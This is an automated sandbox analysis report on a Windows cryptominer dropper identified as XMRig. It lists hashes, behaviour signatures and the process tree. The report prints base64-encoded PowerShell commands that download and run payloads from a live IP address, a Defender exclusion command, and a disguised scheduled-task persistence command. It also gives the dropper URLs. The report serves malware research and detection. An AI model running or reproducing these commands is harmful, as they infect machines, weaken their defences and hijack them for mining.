Analysis

  • max time kernel
    148s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2023 13:50

General

  • Target

    file.exe

  • Size

    35KB

  • MD5

    c1d1e760fab5a557ccaa9c30718d494d

  • SHA1

    1301f10704387b04aa1287f4b1dc9566dac2f991

  • SHA256

    0f962171e6a6219b0a1029987b166d8bd663f23f10cb53c6efe82a9bd11b6c27

  • SHA512

    849143593a1077b091049fe7ea4048340ec69a08274ed6acc86762c862f9d29ecfe5834c720dc5bb629e2ebee106237f1702a667b691f07f233374b354f8724d

  • SSDEEP

    768:8a9pgcJOnauwijxnksy4r/wOPpdwMNhghy0qt:8aXLOnaujc4kmTghy0w

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1960
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:268
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:572
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
              6⤵
              • Creates scheduled task(s)
              PID:1468
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1980
            • C:\Windows\system32\schtasks.exe
              schtasks /run /tn "GoogleUpdateTaskMachineQC"
              6⤵
                PID:1800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:544
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {B6A5DB4C-CA59-404C-81A9-92C2F15CDB0D} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe "cvxjxkjice"
            4⤵
              PID:1512
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1836

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        6beae922a01e99e73292097bf3854a10

        SHA1

        4489c7debe541a5a6d6969c38a73f46edcf9d677

        SHA256

        573cf8c87270e8f5f1fe1bd8cb59df62767b06c3b448afe3fc859f49f0190ae8

        SHA512

        586c01cad56360a8a0ecc719faf8631579cd542ae6c867f69f59f85dff06ddf6b68746a3d292e616bd5527ddb66433ab32cc0396fe7a8a44a913b00a1f024aba

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        6beae922a01e99e73292097bf3854a10

        SHA1

        4489c7debe541a5a6d6969c38a73f46edcf9d677

        SHA256

        573cf8c87270e8f5f1fe1bd8cb59df62767b06c3b448afe3fc859f49f0190ae8

        SHA512

        586c01cad56360a8a0ecc719faf8631579cd542ae6c867f69f59f85dff06ddf6b68746a3d292e616bd5527ddb66433ab32cc0396fe7a8a44a913b00a1f024aba

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        6beae922a01e99e73292097bf3854a10

        SHA1

        4489c7debe541a5a6d6969c38a73f46edcf9d677

        SHA256

        573cf8c87270e8f5f1fe1bd8cb59df62767b06c3b448afe3fc859f49f0190ae8

        SHA512

        586c01cad56360a8a0ecc719faf8631579cd542ae6c867f69f59f85dff06ddf6b68746a3d292e616bd5527ddb66433ab32cc0396fe7a8a44a913b00a1f024aba

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • memory/268-96-0x0000000000190000-0x00000000005EB000-memory.dmp
        Filesize

        4.4MB

      • memory/268-97-0x000000001BE50000-0x000000001C284000-memory.dmp
        Filesize

        4.2MB

      • memory/268-95-0x000000001B9F0000-0x000000001BE4C000-memory.dmp
        Filesize

        4.4MB

      • memory/544-111-0x00000000028EB000-0x000000000290A000-memory.dmp
        Filesize

        124KB

      • memory/544-57-0x0000000000000000-mapping.dmp
      • memory/544-68-0x000007FEF4930000-0x000007FEF5353000-memory.dmp
        Filesize

        10.1MB

      • memory/544-81-0x000000001B850000-0x000000001BB4F000-memory.dmp
        Filesize

        3.0MB

      • memory/544-76-0x00000000028E4000-0x00000000028E7000-memory.dmp
        Filesize

        12KB

      • memory/544-139-0x00000000028E4000-0x00000000028E7000-memory.dmp
        Filesize

        12KB

      • memory/544-140-0x00000000028EB000-0x000000000290A000-memory.dmp
        Filesize

        124KB

      • memory/544-77-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp
        Filesize

        11.4MB

      • memory/544-87-0x00000000028EB000-0x000000000290A000-memory.dmp
        Filesize

        124KB

      • memory/572-99-0x0000000000000000-mapping.dmp
      • memory/1352-72-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp
        Filesize

        11.4MB

      • memory/1352-58-0x0000000000000000-mapping.dmp
      • memory/1352-80-0x000000001B7F0000-0x000000001BAEF000-memory.dmp
        Filesize

        3.0MB

      • memory/1352-75-0x00000000028B4000-0x00000000028B7000-memory.dmp
        Filesize

        12KB

      • memory/1352-84-0x00000000028BB000-0x00000000028DA000-memory.dmp
        Filesize

        124KB

      • memory/1352-85-0x00000000028B4000-0x00000000028B7000-memory.dmp
        Filesize

        12KB

      • memory/1352-86-0x00000000028BB000-0x00000000028DA000-memory.dmp
        Filesize

        124KB

      • memory/1352-69-0x000007FEF4930000-0x000007FEF5353000-memory.dmp
        Filesize

        10.1MB

      • memory/1468-102-0x0000000000000000-mapping.dmp
      • memory/1512-114-0x0000000001BC0000-0x0000000001BCE000-memory.dmp
        Filesize

        56KB

      • memory/1512-113-0x0000000001B60000-0x0000000001B7A000-memory.dmp
        Filesize

        104KB

      • memory/1512-108-0x0000000000060000-0x0000000000079000-memory.dmp
        Filesize

        100KB

      • memory/1512-110-0x0000000000000000-mapping.dmp
      • memory/1512-112-0x0000000000060000-0x0000000000079000-memory.dmp
        Filesize

        100KB

      • memory/1688-59-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp
        Filesize

        8KB

      • memory/1688-89-0x000000000247B000-0x000000000249A000-memory.dmp
        Filesize

        124KB

      • memory/1688-71-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp
        Filesize

        11.4MB

      • memory/1688-55-0x0000000000000000-mapping.dmp
      • memory/1688-74-0x0000000002474000-0x0000000002477000-memory.dmp
        Filesize

        12KB

      • memory/1688-88-0x0000000002474000-0x0000000002477000-memory.dmp
        Filesize

        12KB

      • memory/1688-65-0x000007FEF4930000-0x000007FEF5353000-memory.dmp
        Filesize

        10.1MB

      • memory/1688-78-0x000000001B820000-0x000000001BB1F000-memory.dmp
        Filesize

        3.0MB

      • memory/1688-82-0x000000000247B000-0x000000000249A000-memory.dmp
        Filesize

        124KB

      • memory/1720-107-0x0000000002590000-0x0000000002596000-memory.dmp
        Filesize

        24KB

      • memory/1800-103-0x0000000000000000-mapping.dmp
      • memory/1836-125-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-135-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-144-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-143-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/1836-142-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-141-0x00000000000E0000-0x0000000000100000-memory.dmp
        Filesize

        128KB

      • memory/1836-138-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-136-0x000000014036EAC4-mapping.dmp
      • memory/1836-133-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-132-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-116-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-117-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-119-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-121-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-123-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-91-0x0000000000000000-mapping.dmp
      • memory/1836-126-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-127-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-129-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1836-131-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1912-105-0x0000000000000000-mapping.dmp
      • memory/1960-70-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp
        Filesize

        11.4MB

      • memory/1960-64-0x000007FEF4930000-0x000007FEF5353000-memory.dmp
        Filesize

        10.1MB

      • memory/1960-93-0x00000000028CB000-0x00000000028EA000-memory.dmp
        Filesize

        124KB

      • memory/1960-79-0x000000001B7B0000-0x000000001BAAF000-memory.dmp
        Filesize

        3.0MB

      • memory/1960-94-0x00000000028C4000-0x00000000028C7000-memory.dmp
        Filesize

        12KB

      • memory/1960-83-0x00000000028CB000-0x00000000028EA000-memory.dmp
        Filesize

        124KB

      • memory/1960-56-0x0000000000000000-mapping.dmp
      • memory/1960-73-0x00000000028C4000-0x00000000028C7000-memory.dmp
        Filesize

        12KB

      • memory/1980-101-0x0000000000000000-mapping.dmp
      • memory/2024-54-0x0000000000D80000-0x0000000000D90000-memory.dmp
        Filesize

        64KB